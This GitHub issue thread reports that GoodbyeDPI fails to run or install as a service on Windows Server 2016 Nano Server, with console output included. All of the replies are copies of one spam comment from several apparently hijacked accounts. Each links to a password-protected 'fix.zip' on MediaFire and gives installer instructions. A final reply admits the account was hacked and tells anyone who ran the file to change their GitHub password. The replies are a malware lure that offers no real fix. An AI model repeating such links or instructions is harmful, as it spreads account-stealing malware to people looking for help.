### ISSUE TITLE
Windows Server 2016 Nano Server

### ISSUE THREAD

**Issue by chelaxian** [ValdikSS/GoodbyeDPI#590]
### Operating system / операционная система

Windows Server 2016 Nano Server (CTP 5)

### Running as service / Запуск программы как сервис

I run it as a regular program / Запускаю программу обычным образом

### Describe the bug / Опишите ошибку программы

I am trying to run GoodbyeDPI on Windows Server 2016 Nano Server.
The goal is to raise a Windows VM as a router (with minimal resource consumption - now it consumes 430 MB RAM and 800 MB hard disk).
When running a script from powershell console via WinRMI remote console - the service does not start (neither manually nor via .cmd scripts). The autostart service is also can not be installed.
Is it possible that Win2016nano is too stripped down and lacks some libraries/services/daemons?
Is GoodbyeDPI compatible with Windows Server 2016 Nano Server (it's a relative of Windows 10 - it should work)? If unknown - what requirements and the presence of what files/features etc. should be checked to conclude compatibility or lack thereof? Thanks! Below is the output to the console on startup:

==========================================================

Пытаюсь запустить GoodbyeDPI на Windows Server 2016 Nano Server.
Цель - поднять ВМ на Windows (с минимальным потреблением ресурсов - 430 МБ RAM вышло и 800 МБ жесткий диск) в качестве роутера.
При запуске скрипта из консоли powershell по удаленной консоли WinRMI - сервис не запускается (ни вручную, ни через скрипты .cmd). Сервис так же не устанавливается.
Возможно Win2016nano слишком урезанная и в ней не хватает каких-то библиотек/сервисов/демонов?
Известна ли совместимость GoodbyeDPI c Windows Server 2016 Nano Server (Это же родственник Windows 10 - должно работать)? Если неизвестна - какие требования и наличие каких файлов/функций и т.д. следует проверить чтобы сделать вывод о наличии совместимости или ее отсутствие? Спасибо! Ниже вывод в консоль при запуске:

```
[10.11.0.228]: PS C:\Users\Administrator\Documents\goodbyedpi023\x86_64> .\goodbyedpi.exe -9 --blacklist ..\russia-blacklist.txt --blacklist ..\russia-youtube.txt > output.log 2>&1
[10.11.0.228]: PS C:\Users\Administrator\Documents\goodbyedpi023\x86_64> dir


    Directory: C:\Users\Administrator\Documents\goodbyedpi023\x86_64


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       31.07.2024      1:49          97792 goodbyedpi.exe
-a----       26.08.2024      4:12              0 output.log
-a----       31.07.2024      1:49          47104 WinDivert.dll
-a----       31.07.2024      1:49          92120 WinDivert64.sys


[10.11.0.228]: PS C:\Users\Administrator\Documents\goodbyedpi023\x86_64> ..\1_russia_blacklist.cmd
[10.11.0.228]: PS C:\Users\Administrator\Documents\goodbyedpi023\x86_64> ..\service_install_russia_blacklist.cmd
This script should be run with administrator privileges.
Right click - run as administrator.
Press any key if you're running it as administrator.
Press any key to continue . . .
[SC] OpenService FAILED 1060:

The specified service does not exist as an installed service.

[SC] OpenService FAILED 1060:

The specified service does not exist as an installed service.

[SC] CreateService SUCCESS
[SC] ChangeServiceConfig2 SUCCESS
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

[10.11.0.228]: PS C:\Users\Administrator\Documents\goodbyedpi023\x86_64> Get-Process

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id  SI ProcessName
-------  ------    -----      ----- -----   ------     --  -- -----------
      0       6      768       1672 ...64     0,05    304   0 csrss
      0       6     1688       6856 ...74     0,03    308   0 EMT
      0       0        0          4     0               0   0 Idle
      0      17     3792      10700 ...92     0,16    372   0 lsass
      0       8     1608       5256 ...69     0,05    352   0 services
      0       2      300       1128 ...58     0,00    224   0 smss
      0       7     1376       5652 ...78     0,05    472   0 svchost
      0      12     1712       6192 ...78     0,00    520   0 svchost
      0      11     5428       9568 ...89     0,03    600   0 svchost
      0      22     7832      18092 ...48     0,16    632   0 svchost
      0      13     2196       7116 ...81     0,02    668   0 svchost
      0      29     7012      16544 ...21     0,27    700   0 svchost
      0      26     4096       9768 ...92     0,03    800   0 svchost
      0      14     4508      12244 ...28     0,05    968   0 svchost
      0       0       80         80     2     2,41      4   0 System
      0       7      720       4036 ...70     0,03    332   0 wininit
      0      29    32352      54636 ...32     0,61    580   0 wsmprovhost
      0      29    32280      53760 ...33     0,59    680   0 wsmprovhost
      0      35    42800      69024 ...45     1,45    920   0 wsmprovhost
      0      29    32200      53704 ...32     0,58   1072   0 wsmprovhost
      0      29    32136      53740 ...32     0,59   1156   0 wsmprovhost
      0      35    76068     101660 ...80     1,36   1476   0 wsmprovhost
      0      29    32820      54724 ...32     0,58   1688   0 wsmprovhost
      0      31    38496      61936 ...35     1,02   1732   0 wsmprovhost
      0      29    31972      54032 ...32     0,58   1760   0 wsmprovhost
      0      29    31616      53656 ...32     0,53   1948   0 wsmprovhost
```

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
> это что за атака ботов така

Я прошу прощения, мой аккаунт был взломан, если вы нажали и скачали этот файл и запустили его, немедленно измените свой пароль на github.
